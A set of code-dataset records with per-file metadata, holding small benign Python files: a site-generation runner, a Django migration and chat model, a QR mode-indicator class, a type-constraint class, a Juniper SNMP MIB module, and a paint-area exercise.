] | null | null | null | run_extraction_and_generation.py | aychen99/Excavating-Occaneechi-Town | 6e864ca69ff1881554eb4c88aebed236bafbeaf4 | [
"MIT"
] | null | null | null | import json
import pathlib
from src.extract_old_site.extract import run_extraction
from src.generate_new_site.generate import generate_site
if __name__ == "__main__":
    script_root_dir = pathlib.Path(__file__).parent
    config = None
    with open((script_root_dir / "config.json")) as f:
        config = json.load(f)

    # Resolve any default config values
    if config["extractionOutputDirPath"] == "Default":
        config["extractionOutputDirPath"] = str(script_root_dir / "jsons")
    if config["generationOutputDirPath"] == "Default":
        config["generationOutputDirPath"] = str(script_root_dir / "newdig")
        (script_root_dir / "newdig").mkdir(parents=True, exist_ok=True)

    # Set up for generating the site
    dig_dir = str((pathlib.Path(config["digParentDirPath"]) / "dig").as_posix())
    input_dir = config["extractionOutputDirPath"]
    output_dir = config["generationOutputDirPath"]
    overwrite_out = config["overwriteExistingGeneratedFiles"]
    copy_images = config["copyImages"]
    copy_videos = config["copyVideos"]
    copy_data = config["copyData"]

    # Run extraction and site generation
    if config['runExtraction']:
        print("\n-----------------------------------\n"
              "Extracting old site data.\n")
        run_extraction(config)
    else:
        print("\n-----------------------------------\n"
              "SKIPPING extracting old site data.\n")
    if config['runGeneration']:
        print("\n-----------------------------------\n"
              "Generating new site files.\n")
        generate_site(dig_dir, input_dir, output_dir, overwrite_out, copy_images, copy_videos, copy_data)
    else:
        print("\n-----------------------------------\n"
              "SKIPPING generating new site files.\n")

    # if config['runDigPro']:
    #     TODO
    #     pass
| 38.354167 | 105 | 0.612167 | 195 | 1,841 | 5.54359 | 0.384615 | 0.046253 | 0.06013 | 0.029602 | 0.118409 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.204237 | 1,841 | 47 | 106 | 39.170213 | 0.737884 | 0.072243 | 0 | 0.171429 | 1 | 0 | 0.338624 | 0.191064 | 0 | 0 | 0 | 0.021277 | 0 | 1 | 0 | false | 0 | 0.114286 | 0 | 0.114286 | 0.114286 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
7ecfee91de6afd15c9b4944fc8130ce2c7df090a | 162 | py | Python | top_players.py | ergest/Fantasy-Premier-League | 7773eaad57058e760c5d1f77cfa98d2a06d73e48 | [
"MIT"
] | 1,011 | 2016-12-30T09:37:45.000Z | 2022-03-31T02:50:09.000Z | top_players.py | ergest/Fantasy-Premier-League | 7773eaad57058e760c5d1f77cfa98d2a06d73e48 | [
"MIT"
] | 111 | 2018-04-13T02:02:09.000Z | 2022-02-21T05:07:39.000Z | top_players.py | ergest/Fantasy-Premier-League | 7773eaad57058e760c5d1f77cfa98d2a06d73e48 | [
"MIT"
] | 739 | 2017-12-27T03:30:18.000Z | 2022-03-22T14:09:04.000Z | from getters import *
from parsers import *
def main():
    data = get_data()
    parse_top_players(data, 'data/2020-21')


if __name__ == '__main__':
    main()
| 16.2 | 43 | 0.654321 | 22 | 162 | 4.318182 | 0.681818 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.046875 | 0.209877 | 162 | 9 | 44 | 18 | 0.695313 | 0 | 0 | 0 | 0 | 0 | 0.123457 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.142857 | false | 0 | 0.285714 | 0 | 0.428571 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
7ed81731d9af7ea6f386a90d704f7cac21f33072 | 194 | py | Python | QRCodeLib/qrcodelib/format/mode_indicator.py | yas78/QRCodeLibPy | 7b2c489b5e38aa23619ae41bff7a31993885275b | [
"MIT"
] | null | null | null | QRCodeLib/qrcodelib/format/mode_indicator.py | yas78/QRCodeLibPy | 7b2c489b5e38aa23619ae41bff7a31993885275b | [
"MIT"
] | 1 | 2019-11-04T13:44:44.000Z | 2019-11-04T13:44:44.000Z | QRCodeLib/qrcodelib/format/mode_indicator.py | yas78/QRCodeLibPy | 7b2c489b5e38aa23619ae41bff7a31993885275b | [
"MIT"
] | null | null | null | class ModeIndicator:
LENGTH = 4
TERMINATOR_VALUE = 0x0
NUMERIC_VALUE = 0x1
ALPHANUMERIC_VALUE = 0x2
STRUCTURED_APPEND_VALUE = 0x3
BYTE_VALUE = 0x4
KANJI_VALUE = 0x8
| 19.4 | 33 | 0.690722 | 23 | 194 | 5.521739 | 0.782609 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.091549 | 0.268041 | 194 | 9 | 34 | 21.555556 | 0.802817 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.092784 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
7ee162a59b2d4c88fd31a1e5da83b93341c5641c | 2,980 | py | Python | planner/migrations/0020_auto_20171028_1709.py | zhajio1988/Vplanner | 2b84bac7c8e36fde5eecc73682fde561613273d1 | [
"Apache-2.0"
] | 4 | 2019-08-26T01:20:35.000Z | 2022-01-26T09:18:27.000Z | planner/migrations/0020_auto_20171028_1709.py | zhajio1988/Vplanner | 2b84bac7c8e36fde5eecc73682fde561613273d1 | [
"Apache-2.0"
] | null | null | null | planner/migrations/0020_auto_20171028_1709.py | zhajio1988/Vplanner | 2b84bac7c8e36fde5eecc73682fde561613273d1 | [
"Apache-2.0"
] | 1 | 2020-07-27T16:14:01.000Z | 2020-07-27T16:14:01.000Z | # -*- coding: utf-8 -*-
# Generated by Django 1.11.5 on 2017-10-28 09:09
from __future__ import unicode_literals
import django.core.validators
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):

    dependencies = [
        ('planner', '0019_auto_20171028_1706'),
    ]

    operations = [
        migrations.CreateModel(
            name='FeatureDetail',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('priority', models.CharField(choices=[('p1', 'P1'), ('p2', 'P2'), ('p3', 'P3')], default='p1', max_length=10)),
                ('sim_req', models.CharField(max_length=128, verbose_name='Simulation Requirements')),
                ('seq_req', models.CharField(max_length=128, verbose_name='Sequence Requirements')),
                ('check_desp', models.CharField(max_length=128, verbose_name='Checking Description')),
                ('func_cov_req', models.CharField(max_length=128, verbose_name='Func Cov Requirements')),
                ('measure_src', models.TextField(verbose_name='Measure Source')),
                ('test_cov', models.PositiveSmallIntegerField(default=0, validators=[django.core.validators.MaxValueValidator(100)], verbose_name='Testcase Coverage')),
                ('line_cov', models.PositiveSmallIntegerField(default=0, validators=[django.core.validators.MaxValueValidator(100)], verbose_name='Line Coverage')),
                ('con_cov', models.PositiveSmallIntegerField(default=0, validators=[django.core.validators.MaxValueValidator(100)], verbose_name='Conditional Coverage')),
                ('toggle_cov', models.PositiveSmallIntegerField(default=0, validators=[django.core.validators.MaxValueValidator(100)], verbose_name='Toggle Coverage')),
                ('fsm_cov', models.PositiveSmallIntegerField(default=0, validators=[django.core.validators.MaxValueValidator(100)], verbose_name='FSM Coverage')),
                ('branch_cov', models.PositiveSmallIntegerField(default=0, validators=[django.core.validators.MaxValueValidator(100)], verbose_name='Branch Coverage')),
                ('assert_cov', models.PositiveSmallIntegerField(default=0, validators=[django.core.validators.MaxValueValidator(100)], verbose_name='Assertion Coverage')),
                ('func_cov', models.PositiveSmallIntegerField(default=0, validators=[django.core.validators.MaxValueValidator(100)], verbose_name='Functional Coverage')),
                ('feature', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, to='planner.Feature')),
            ],
        ),
        migrations.RenameModel(
            old_name='OperationLogs',
            new_name='ChangeList',
        ),
        migrations.RemoveField(
            model_name='featureitem',
            name='feature',
        ),
        migrations.DeleteModel(
            name='FeatureItem',
        ),
    ]
| 59.6 | 171 | 0.667785 | 294 | 2,980 | 6.608844 | 0.35034 | 0.079259 | 0.09264 | 0.168811 | 0.506948 | 0.506948 | 0.506948 | 0.487391 | 0.424086 | 0.424086 | 0 | 0.035774 | 0.193289 | 2,980 | 49 | 172 | 60.816327 | 0.772463 | 0.022819 | 0 | 0.095238 | 1 | 0 | 0.167068 | 0.007907 | 0 | 0 | 0 | 0 | 0.02381 | 1 | 0 | false | 0 | 0.095238 | 0 | 0.166667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
7ee771d4ce34d997b16dc36b66c0cfae9cd23bd9 | 1,177 | py | Python | typhon/core/type_system/constraints/member_constraint.py | strongrex2001/typhon | 7a8ad7e0252768844009ab331fc8aa61350f23a9 | [
"Apache-2.0"
] | 4 | 2021-03-03T12:44:34.000Z | 2021-07-03T10:15:43.000Z | typhon/core/type_system/constraints/member_constraint.py | eliphatfs/typhon | 7a8ad7e0252768844009ab331fc8aa61350f23a9 | [
"Apache-2.0"
] | null | null | null | typhon/core/type_system/constraints/member_constraint.py | eliphatfs/typhon | 7a8ad7e0252768844009ab331fc8aa61350f23a9 | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
"""
Created on Sun Mar 14 09:40:01 2021
@author: eliphat
"""
from ..type_var import TypeVar
from ..type_repr import RecordType, BottomType
from ..system import TypeSystem
from .base_constraint import BaseConstraint
from .equality_constraint import EqualityConstraint
class MemberConstraint(BaseConstraint):

    def __init__(self, v_dst: TypeVar, v_src: TypeVar, record_label: str):
        self.dst = v_dst
        self.src = v_src
        self.k = record_label

    def cause_vars(self):
        return [self.src]

    def effect_vars(self):
        return [self.dst]

    def fix(self, ts: TypeSystem):
        T = self.src.T
        if isinstance(T, BottomType):
            return
        if isinstance(T, RecordType):
            if self.k in T.members:
                rec = T.members[self.k]
                if isinstance(rec, TypeVar):
                    ts.add_constraint(EqualityConstraint(self.dst, rec))
                else:
                    self.dst.T = rec
                return
        raise TypeError("Type %s does not have member %s" % (T, self.k))

    def is_resolved(self):
        return isinstance(self.src.T, RecordType)
| 28.02381 | 74 | 0.607477 | 148 | 1,177 | 4.709459 | 0.432432 | 0.040172 | 0.040172 | 0.05165 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.015644 | 0.293968 | 1,177 | 41 | 75 | 28.707317 | 0.823105 | 0.064571 | 0 | 0.068966 | 0 | 0 | 0.028362 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.172414 | false | 0 | 0.172414 | 0.103448 | 0.551724 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 2 |
7eee18f21f85e2ef6c713447b04ed57350a47292 | 3,281 | py | Python | pysnmp-with-texts/Juniper-V35-CONF.py | agustinhenze/mibs.snmplabs.com | 1fc5c07860542b89212f4c8ab807057d9a9206c7 | [
"Apache-2.0"
] | 8 | 2019-05-09T17:04:00.000Z | 2021-06-09T06:50:51.000Z | pysnmp-with-texts/Juniper-V35-CONF.py | agustinhenze/mibs.snmplabs.com | 1fc5c07860542b89212f4c8ab807057d9a9206c7 | [
"Apache-2.0"
] | 4 | 2019-05-31T16:42:59.000Z | 2020-01-31T21:57:17.000Z | pysnmp-with-texts/Juniper-V35-CONF.py | agustinhenze/mibs.snmplabs.com | 1fc5c07860542b89212f4c8ab807057d9a9206c7 | [
"Apache-2.0"
] | 10 | 2019-04-30T05:51:36.000Z | 2022-02-16T03:33:41.000Z | #
# PySNMP MIB module Juniper-V35-CONF (http://snmplabs.com/pysmi)
# ASN.1 source file:///Users/davwang4/Dev/mibs.snmplabs.com/asn1/Juniper-V35-CONF
# Produced by pysmi-0.3.4 at Wed May 1 14:04:44 2019
# On host DAVWANG4-M-1475 platform Darwin version 18.5.0 by user davwang4
# Using Python version 3.7.3 (default, Mar 27 2019, 09:23:15)
#
OctetString, ObjectIdentifier, Integer = mibBuilder.importSymbols("ASN1", "OctetString", "ObjectIdentifier", "Integer")
NamedValues, = mibBuilder.importSymbols("ASN1-ENUMERATION", "NamedValues")
ValueRangeConstraint, ConstraintsUnion, SingleValueConstraint, ValueSizeConstraint, ConstraintsIntersection = mibBuilder.importSymbols("ASN1-REFINEMENT", "ValueRangeConstraint", "ConstraintsUnion", "SingleValueConstraint", "ValueSizeConstraint", "ConstraintsIntersection")
juniAgents, = mibBuilder.importSymbols("Juniper-Agents", "juniAgents")
ModuleCompliance, AgentCapabilities, NotificationGroup = mibBuilder.importSymbols("SNMPv2-CONF", "ModuleCompliance", "AgentCapabilities", "NotificationGroup")
Bits, Integer32, MibIdentifier, Counter32, Gauge32, NotificationType, IpAddress, ModuleIdentity, iso, ObjectIdentity, MibScalar, MibTable, MibTableRow, MibTableColumn, Counter64, TimeTicks, Unsigned32 = mibBuilder.importSymbols("SNMPv2-SMI", "Bits", "Integer32", "MibIdentifier", "Counter32", "Gauge32", "NotificationType", "IpAddress", "ModuleIdentity", "iso", "ObjectIdentity", "MibScalar", "MibTable", "MibTableRow", "MibTableColumn", "Counter64", "TimeTicks", "Unsigned32")
TextualConvention, DisplayString = mibBuilder.importSymbols("SNMPv2-TC", "TextualConvention", "DisplayString")
juniV35Agent = ModuleIdentity((1, 3, 6, 1, 4, 1, 4874, 5, 2, 54))
juniV35Agent.setRevisions(('2002-09-06 16:54', '2002-01-25 21:43',))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
if mibBuilder.loadTexts: juniV35Agent.setRevisionsDescriptions(('Replaced Unisphere names with Juniper names.', 'The initial release of this management information module.',))
if mibBuilder.loadTexts: juniV35Agent.setLastUpdated('200209061654Z')
if mibBuilder.loadTexts: juniV35Agent.setOrganization('Juniper Networks, Inc.')
if mibBuilder.loadTexts: juniV35Agent.setContactInfo(' Juniper Networks, Inc. Postal: 10 Technology Park Drive Westford, MA 01886-3146 USA Tel: +1 978 589 5800 E-mail: mib@Juniper.net')
if mibBuilder.loadTexts: juniV35Agent.setDescription('The agent capabilities definitions for the X.21/V.35 server component of the SNMP agent in the Juniper E-series family of products.')
juniV35AgentV1 = AgentCapabilities((1, 3, 6, 1, 4, 1, 4874, 5, 2, 54, 1))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
juniV35AgentV1 = juniV35AgentV1.setProductRelease('Version 1 of the X.21/V.35 component of the JUNOSe SNMP agent. This\n version of the X.21/V.35 component is supported in JUNOSe 4.0 and\n subsequent system releases.')
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
juniV35AgentV1 = juniV35AgentV1.setStatus('current')
if mibBuilder.loadTexts: juniV35AgentV1.setDescription('The MIB supported by the SNMP agent for the X.21/V.35 application in JUNOSe.')
mibBuilder.exportSymbols("Juniper-V35-CONF", juniV35AgentV1=juniV35AgentV1, PYSNMP_MODULE_ID=juniV35Agent, juniV35Agent=juniV35Agent)
| 105.83871 | 477 | 0.772021 | 389 | 3,281 | 6.506427 | 0.439589 | 0.063611 | 0.049783 | 0.065192 | 0.307388 | 0.229158 | 0.219676 | 0.203872 | 0.203872 | 0.203872 | 0 | 0.081951 | 0.09997 | 3,281 | 30 | 478 | 109.366667 | 0.775144 | 0.09936 | 0 | 0.136364 | 0 | 0.136364 | 0.410726 | 0.014936 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.318182 | 0 | 0.318182 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 2 |
7d0038100c8c0111fa664f6eb6cc9dd2beee4fca | 335 | py | Python | chatting/models.py | aliakbars/tbdc | ac8fe28b781cbc5e6e9cf7dc9579cc94c7e9ec55 | [
"Apache-2.0"
] | null | null | null | chatting/models.py | aliakbars/tbdc | ac8fe28b781cbc5e6e9cf7dc9579cc94c7e9ec55 | [
"Apache-2.0"
] | null | null | null | chatting/models.py | aliakbars/tbdc | ac8fe28b781cbc5e6e9cf7dc9579cc94c7e9ec55 | [
"Apache-2.0"
] | null | null | null | from __future__ import unicode_literals
from django.db import models
from django.contrib.auth.models import User
# Create your models here.
class Chat(models.Model):
    content = models.TextField()
    sender = models.ForeignKey(User)
    receiver = models.ForeignKey(User)
    date_created = models.DateTimeField(auto_now_add=True)
date_created = models.DateTimeField(auto_now_add=True) | 30.454545 | 58 | 0.776119 | 44 | 335 | 5.727273 | 0.659091 | 0.079365 | 0.15873 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.143284 | 335 | 11 | 58 | 30.454545 | 0.878049 | 0.071642 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.375 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 2 |
7d187ae720e582888dbe9f2c84697c0a7a77dbce | 352 | py | Python | curso_em_video/mundo_1/exs_python/ExPy011.py | LuiZamberlan/Ex.-Python | f5b6e4782e0ce0e3fead82b126b52588e1bc21b0 | [
"MIT"
] | 1 | 2020-09-19T21:39:12.000Z | 2020-09-19T21:39:12.000Z | curso_em_video/mundo_1/exs_python/ExPy011.py | LuiZamberlan/Ex.-Python | f5b6e4782e0ce0e3fead82b126b52588e1bc21b0 | [
"MIT"
] | null | null | null | curso_em_video/mundo_1/exs_python/ExPy011.py | LuiZamberlan/Ex.-Python | f5b6e4782e0ce0e3fead82b126b52588e1bc21b0 | [
"MIT"
] | null | null | null | l = float(input('Digite a largura da parede em metros: '))
al = float(input('Digite a altura da parede em metros: '))
#Um litro de tinta pinta 2m², largura * altura da parede obtemos a área dela em m² e dividimos por dois para obter a quantidade de tinta necessária.
lt = (l * al) / 2
print(f'Com uma parede {l}x{al}, você usará {lt:.2f}L de tinta')
| 44 | 148 | 0.704545 | 66 | 352 | 3.757576 | 0.606061 | 0.096774 | 0.129032 | 0.137097 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.017483 | 0.1875 | 352 | 7 | 149 | 50.285714 | 0.84965 | 0.417614 | 0 | 0 | 0 | 0 | 0.632353 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.25 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |